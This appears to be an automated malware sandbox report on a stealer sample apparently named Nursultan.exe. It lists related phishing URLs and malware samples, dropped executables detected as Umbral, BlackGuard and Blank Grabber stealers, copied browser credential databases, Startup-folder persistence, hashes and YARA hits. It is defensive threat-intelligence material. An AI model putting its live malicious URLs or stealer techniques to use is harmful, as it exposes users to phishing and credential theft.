                                      https://ibd.fcs.mybluehost.me/en/RDGDESDZRFSYJNOI/index.php?FGDD=1Get hashmaliciousHTMLPhisherBrowse
                                      • 104.17.24.14
                                      https://contact-page-helper.bond/contract/61559135234072Get hashmaliciousUnknownBrowse
                                      • 172.67.74.152
                                      http://helpdesk-case-review-appeal-id-09875613.d3218g79rs5u78.amplifyapp.com/index.htmlGet hashmaliciousUnknownBrowse
                                      • 104.26.4.15
                                      https://apple-proxy.anwen.workers.dev/Get hashmaliciousHTMLPhisherBrowse
                                      • 188.114.96.3
                                      http://vineethkinik.github.io/Netflix-wesite-frontendGet hashmaliciousHTMLPhisherBrowse
                                      • 104.18.86.42
                                      http://buaguhidjn28d.vercel.app/Get hashmaliciousUnknownBrowse
                                      • 104.26.13.205
                                      https://sso--cdn-sub-coinbasepro-auth.webflow.io/Get hashmaliciousUnknownBrowse
                                      • 172.64.153.29
                                      https://sso--cdn--coinbasepro-h-auth.webflow.io/Get hashmaliciousUnknownBrowse
                                      • 104.18.34.227
                                      TUT-ASUSaimbot.exeGet hashmaliciousXWormBrowse
                                      • 208.95.112.1
                                      SecuriteInfo.com.BackDoor.SpyBotNET.58.29400.29032.exeGet hashmaliciousQuasar, Blank Grabber, Njrat, XWormBrowse
                                      • 208.95.112.1
                                      External.exeGet hashmaliciousAdes Stealer, BlackGuard, VEGA StealerBrowse
                                      • 208.95.112.1
                                      #U03a4#U0399#U039c#U039f#U039b#U039f#U0393#U0399#U039f Doc_PRG211003417144356060.PDF.exeGet hashmaliciousAgentTeslaBrowse
                                      • 208.95.112.1
                                      Request for Quotation_1.jsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                      • 208.95.112.1
                                      IDR-500000000.scr.exeGet hashmaliciousAgentTeslaBrowse
                                      • 208.95.112.1
                                      Orden de Compra 4500491659.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                      • 208.95.112.1
                                      comprobante.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                      • 208.95.112.1
                                      Richiesta-Ordine.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                      • 208.95.112.1
                                      XClient.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                      • 208.95.112.1
                                      SALSGIVERUSaimbot.exeGet hashmaliciousXWormBrowse
                                      • 147.185.221.22
                                      Launcher.exeGet hashmaliciousUnknownBrowse
                                      • 147.185.221.22
                                      Launcher.exeGet hashmaliciousUnknownBrowse
                                      • 147.185.221.22
                                      Server.exeGet hashmaliciousUnknownBrowse
                                      • 147.185.221.19
                                      Hoodbyunlock.exeGet hashmaliciousXWormBrowse
                                      • 147.185.221.17
                                      x.exeGet hashmaliciousXWormBrowse
                                      • 147.185.221.17
                                      silverclient.exeGet hashmaliciousUnknownBrowse
                                      • 147.185.221.22
                                      XClient.exeGet hashmaliciousXWormBrowse
                                      • 147.185.221.20
                                      JFhDGHXmW6.exeGet hashmaliciousUnknownBrowse
                                      • 147.185.221.21
                                      Stub.exeGet hashmaliciousUnknownBrowse
                                      • 147.185.221.22

                                      JA3 Fingerprints

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      3b5074b1b5d032e5620f69f9f700ff0ehttps://securemetamaskvallet.webflow.io/Get hashmaliciousUnknownBrowse
                                      • 104.21.85.189
                                      • 188.114.97.3
                                      • 162.159.135.232
                                      https://helpercenter.freewebhostmost.com/Get hashmaliciousUnknownBrowse
                                      • 104.21.85.189
                                      • 188.114.97.3
                                      • 162.159.135.232
                                      https://qrco.de/bfN4CG?akutaktaauapayangkauberikan=Get hashmaliciousUnknownBrowse
                                      • 104.21.85.189
                                      • 188.114.97.3
                                      • 162.159.135.232
                                      Canon_Scan_239.pdfGet hashmaliciousUnknownBrowse
                                      • 104.21.85.189
                                      • 188.114.97.3
                                      • 162.159.135.232
                                      https://conectetwallet.gitbook.io/usGet hashmaliciousUnknownBrowse
                                      • 104.21.85.189
                                      • 188.114.97.3
                                      • 162.159.135.232
                                      https://quickpay-arabian.com/Get hashmaliciousUnknownBrowse
                                      • 104.21.85.189
                                      • 188.114.97.3
                                      • 162.159.135.232
                                      https://re6856-sdo324d.pages.dev/robots.txt/Get hashmaliciousUnknownBrowse
                                      • 104.21.85.189
                                      • 188.114.97.3
                                      • 162.159.135.232
                                      https://ssomtamask-wallet.webflow.io/Get hashmaliciousUnknownBrowse
                                      • 104.21.85.189
                                      • 188.114.97.3
                                      • 162.159.135.232
                                      http://pub-5318ffd0fada44dd97326dbd4ce89ac7.r2.dev/index.html?err=0hwpvszsztyyi3a3wwxr3dbsljnuegcted78srz6pch8mrfi6qj701oydhbgif0tjk2yc2s3u5ksnrkarlbt90hruunhdazok4db3d8bbwy9w72pdd9jweauy4zjnbezzsmzsb67ioik7ahov3fh95b7eqki99kjpi65xjcm9n1pmrz3cajnkq2nxbqqviqizc4hvlthzyipni71qo5q6ukevq8dzlbuzm2ourvw&dispatch=3h8aj8gc26f87d4702h445a0fg3id2&id=38i1c29ihb65ggci7k43afdhdae09f85e92j055gj9ja8Get hashmaliciousHTMLPhisherBrowse
                                      • 104.21.85.189
                                      • 188.114.97.3
                                      • 162.159.135.232
                                      https://la-ips.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVEyOXBaR009JnVpZD1VU0VSMjkwODIwMjRVMTEwODI5MzY=N0123Njwarren@arrivesdaa.comGet hashmaliciousUnknownBrowse
                                      • 104.21.85.189
                                      • 188.114.97.3
                                      • 162.159.135.232

                                      Dropped Files

                                      No context

                                      Created / dropped Files

                                      C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uOWQK.scr

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\Umbral.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):236544
                                      Entropy (8bit):6.080049516389128
                                      Encrypted:false
                                      SSDEEP:6144:xloZM+rIkd8g+EtXHkv/iD4YD+rmkrHMs9YW3X2TFb8e1m9H4i:DoZtL+EP8YD+rmkrHMs9YW3X25IHB
                                      MD5:DF69E1468A4656F2EEC526DE59A89A8B
                                      SHA1:E65E192BE57CD672B8EF19CD72AD89CBD3F8F60A
                                      SHA-256:4D3A9636E9D29F227B56D7BF140154384E1F426B69CF213AE46115E8D966AA92
                                      SHA-512:409DCA3F4CE130034B3004726939A59F38939D46E09F04D6C8A77EA20E3FF931D1A7332F00C06C3E46D8C64796AC93299C2F5A6595777F3E05CF89BC0522449F
                                      Malicious:true
                                      Yara Hits:
                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uOWQK.scr, Author: Joe Security
                                      • Rule: JoeSecurity_UmbralStealer, Description: Yara detected Umbral Stealer, Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uOWQK.scr, Author: Joe Security
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attemping to enumerate video devices using WMI, Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uOWQK.scr, Author: ditekSHen
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 92%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l.a..........."...0.................. ........@.. ....................................`....................................K.......P............................................................................ ............... ..H............text...$.... ...................... ..`.rsrc...P...........................@..@.reloc..............................@..B........................H.......@...t.......6.....................................................{....*..{....*V.(......}......}....*...0..A........u........4.,/(.....{.....{....o....,.(.....{.....{....o....*.*.*. ... )UU.Z(.....{....o....X )UU.Z(.....{....o....X*...0..b........r...p......%..{.......%q.........-.&.+.......o.....%..{.......%q.........-.&.+.......o.....(....*...0..w.............%.o...(.........~....s..........]..........~.....".".~.....\.\.~......b.~.......f.~.......n.~.......r.~...

                                      C:\Users\Public\v6zchhhv.default-release\cert9.db

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\Insidious.exe
                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 7, database pages 7, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                      Category:dropped
                                      Size (bytes):229376
                                      Entropy (8bit):0.643383182059925
                                      Encrypted:false
                                      SSDEEP:384:A1zkVmvQhyn+Zoz67kMMTNlH333JqN8j/LKXu5Uu/:AlM0sCyW
                                      MD5:F23F48363C7BAA0709698208A7E833A0
                                      SHA1:07D2AEE271A0F2BA14608FE5A9A677E2594D22CC
                                      SHA-256:51DFB72705CBEB6AF5A14F2BE20FC39172E86263E25704F50BEB292F776B7713
                                      SHA-512:F8F16198A96F047E320EF82026160EBD5A0836B48FC3496C427F90965CF3BF5FAB5EBE0FB9016E3BDE56657EB42627D7286AED3167A422D69F865524892C3DFA
                                      Malicious:false
                                      Preview:SQLite format 3......@ ..........................................................................j......z..{...{.{j{*z.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\Users\Public\v6zchhhv.default-release\key4.db

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\Insidious.exe
                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
                                      Category:dropped
                                      Size (bytes):294912
                                      Entropy (8bit):0.08438200565341271
                                      Encrypted:false
                                      SSDEEP:192:5va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23v4U:51zkVmvQhyn+Zoz67NU
                                      MD5:F7EEE7B0D281E250D1D8E36486F5A2C3
                                      SHA1:309736A27E794672BD1BDFBAC69B2C6734FC25CE
                                      SHA-256:378DD46FE8A8AAC2C430AE8A7C5C1DC3C2A343534A64A263EC9A4F1CE801985E
                                      SHA-512:CE102A41CA4E2A27CCB27F415D2D69A75A0058BA0F600C23F63B89F30FFC982BA48336140714C522B46CC6D13EDACCE3DF0D6685D02844B8DB0AD3378DB9CABB
                                      Malicious:false
                                      Preview:SQLite format 3......@ ..........................................................................j......z<.{...{.{a{.z.z<z.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Insidious.exe.log

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\Insidious.exe
                                      File Type:CSV text
                                      Category:dropped
                                      Size (bytes):422
                                      Entropy (8bit):5.364961821133733
                                      Encrypted:false
                                      SSDEEP:12:Q3La/KDLI4MWuPXcp1yoDLI4MWuPCU6yVFO5iv:ML9E4KQEAE4KKUNb
                                      MD5:A780B442F2C888A8E235B7EBC0A9A276
                                      SHA1:DF05FDFCC8054C84A5EFD5422A7EFCE33BA11CE7
                                      SHA-256:DF284B5D66C63DE45B1F365210C09EC1D4C3715282FC223967C222CDA870AA21
                                      SHA-512:A97AB3B3FFE5FAFF29A370E925C96EF6AC49D80DA3DD19A4FA15728B07C285D8612BC566D876FA1F6480C6EC357C3C50666A4B79192DE972F53E9C7F1930EAAF
                                      Malicious:false
                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Microsoft Edge.exe.log

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe
                                      File Type:CSV text
                                      Category:dropped
                                      Size (bytes):654
                                      Entropy (8bit):5.380476433908377
                                      Encrypted:false
                                      SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                      MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                      SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                      SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                      SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                      Malicious:false
                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Nursultan.exe.log

                                      Download File
                                      Process:C:\Users\user\Desktop\Nursultan.exe
                                      File Type:CSV text
                                      Category:dropped
                                      Size (bytes):654
                                      Entropy (8bit):5.380476433908377
                                      Encrypted:false
                                      SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                      MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                      SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                      SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                      SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                      Malicious:true
                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Nursultan2.exe.log

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\Nursultan2.exe
                                      File Type:CSV text
                                      Category:dropped
                                      Size (bytes):654
                                      Entropy (8bit):5.380476433908377
                                      Encrypted:false
                                      SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                      MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                      SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                      SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                      SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                      Malicious:false
                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Umbral.exe.log

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\Umbral.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:modified
                                      Size (bytes):1965
                                      Entropy (8bit):5.377802142292312
                                      Encrypted:false
                                      SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6owHptHTHhAHKKkpLHDJHqHGHK+HKs:iq+wmj0qCYqGSI6owJtzHeqKkpLVKmqs
                                      MD5:582A844EB067319F705A5ADF155DBEB0
                                      SHA1:68B791E0F77249BF83CD4B23A6C4A773365E2CAD
                                      SHA-256:E489CF4E6C01EFE8827F172607D7E3CD89C4870B0B0CA5A33EFE64577E2CB8A9
                                      SHA-512:6F530A0E2D3910459AFEFD0295ACA93D3814AB98D9A6E2BE1C2B8B717F075C87EF908BBF955E38F7B976EC51ED512645D13D0FB60AC865867E573060C5D76B59
                                      Malicious:false
                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System

                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):64
                                      Entropy (8bit):0.34726597513537405
                                      Encrypted:false
                                      SSDEEP:3:Nlll:Nll
                                      MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                      SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                      SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                      SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                      Malicious:false
                                      Preview:@...e...........................................................

                                      C:\Users\user\AppData\Local\Temp\1gWUko2HB0x9rEz

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\Umbral.exe
                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                      Category:dropped
                                      Size (bytes):51200
                                      Entropy (8bit):0.8746135976761988
                                      Encrypted:false
                                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                      Malicious:false
                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\Users\user\AppData\Local\Temp\6h5VA6ANn4hrk2y

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\Umbral.exe
                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                      Category:dropped
                                      Size (bytes):20480
                                      Entropy (8bit):0.8439810553697228
                                      Encrypted:false
                                      SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                      MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                      SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                      SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                      SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                      Malicious:false
                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\Users\user\AppData\Local\Temp\DlRp8Ny2vAlXMqP

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\Umbral.exe
                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                      Category:dropped
                                      Size (bytes):20480
                                      Entropy (8bit):0.6732424250451717
                                      Encrypted:false
                                      SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                      MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                      SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                      SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                      SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                      Malicious:false
                                      Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\Users\user\AppData\Local\Temp\Insidious.exe

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\Nursultan2.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):281088
                                      Entropy (8bit):5.851797552141892
                                      Encrypted:false
                                      SSDEEP:6144:qf+BLtABPDsJJfbdrJwiU0xoZnafTyElI1D0YeY:FJXqiU0xoLp1D+Y
                                      MD5:B70C03532081C928F946E844C5D2172D
                                      SHA1:7908B1D1E9AB5E222FAA6C816DD861382AA4A5C5
                                      SHA-256:3CF9D10FB9434A9C83D0FB65401E65B11FA643264FF17B5A9D75022E5D41AE29
                                      SHA-512:81E4DF48E246E3D842DDF8834BD96388F38E72EAD2AE5F46A473DC9BBFE56621E5912F51A7DEA1BA523B28144E11305EF29D48C61CA3525C80EFC0A76A265ECB
                                      Malicious:true
                                      Yara Hits:
                                      • Rule: JoeSecurity_BlackGuard, Description: Yara detected BlackGuard, Source: C:\Users\user\AppData\Local\Temp\Insidious.exe, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\Insidious.exe, Author: Joe Security
                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\Insidious.exe, Author: Joe Security
                                      • Rule: JoeSecurity_RagsStealer, Description: Yara detected Rags Stealer, Source: C:\Users\user\AppData\Local\Temp\Insidious.exe, Author: Joe Security
                                      • Rule: JoeSecurity_44CaliberStealer, Description: Yara detected 44Caliber Stealer, Source: C:\Users\user\AppData\Local\Temp\Insidious.exe, Author: Joe Security
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: C:\Users\user\AppData\Local\Temp\Insidious.exe, Author: ditekSHen
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_References_VPN, Description: Detects executables referencing many VPN software clients. Observed in infosteslers, Source: C:\Users\user\AppData\Local\Temp\Insidious.exe, Author: ditekSHen
                                      • Rule: MALWARE_Win_A310Logger, Description: Detects A310Logger, Source: C:\Users\user\AppData\Local\Temp\Insidious.exe, Author: ditekSHen
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 88%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....g..........."...0..@.........."8... ...`....@.. ....................................`..................................7..O....`..............................47..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc........`.......B..............@..@.reloc...............H..............@..B.................8......H............(..........................................................2r...p(....&*....0..Z.......s".....rg..p~....o#....ry..p.o#....r...p~....o#...~....~.....(f.....o$...s%...o&....o'...*...0..V.......s".....rg..p.o#....ry..p.o#....r...p~....o#...~....~.....(f.....o$...s%...o&....o'...*...0..R.......s".....rg..p.o#....ry..p.o#....r...p~....o#....~.....(f.....o$...s%...o&....o'...*...0.............s(...%o)....}....%....io*...&o+...s".....r...p.o#....r...p.o#....r...p....s.

                                      C:\Users\user\AppData\Local\Temp\IrkMQrRux8ApBLI

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\Umbral.exe
                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                      Category:dropped
                                      Size (bytes):40960
                                      Entropy (8bit):0.8553638852307782
                                      Encrypted:false
                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                      Malicious:false
                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\Users\user\AppData\Local\Temp\Log.tmp

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):140
                                      Entropy (8bit):4.627408310856503
                                      Encrypted:false
                                      SSDEEP:3:rRSFYJKXzovNsrTyAF1M4W3tcAILCX/FsrTyAFkTAILCX/Fsra:EFYJKDoWrTyAFG4vjrTyAFkTjra
                                      MD5:390E21E04DFEB9E5694145D6A192F2ED
                                      SHA1:91B6B92C60407CDE123551D26F3E41AD44A7F798
                                      SHA-256:7F4CC8A25B0CB0F547560FE22A51F5E75D390C0C1B3A963110D6ABAACF6340B0
                                      SHA-512:CF77C0C60D8B251502835FBB14556A27B3D26384A587C1ED1F5F814EBA38B3A5DF23887DFA6C443FF7DD337D317475936D295CFD93ADF3149CD6445FA0140F47
                                      Malicious:false
                                      Preview:....### explorer ###..[WIN]r....### Administrator: C:\Windows\system32\cmd.exe ###..[WIN]r....### C:\Windows\system32\cmd.exe ###..[WIN]r

                                      C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\Nursultan.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):212480
                                      Entropy (8bit):6.336877018807866
                                      Encrypted:false
                                      SSDEEP:3072:BXOsMDK0jn/VFJIYjbdU2BLOw5KRUGKXs+S++7KFSbxeY+qDDrMP:BoKc/Jjb6MJLGqStKEbxI
                                      MD5:C2A5CD7C5F8A633BAFB54B62CEE38077
                                      SHA1:033474BEFFB4C91158BD208EB80B39C0A26F6B2D
                                      SHA-256:DFCF3ED114355B554D2A3814946029C2688C4F617959B69375ED730250B9E9B1
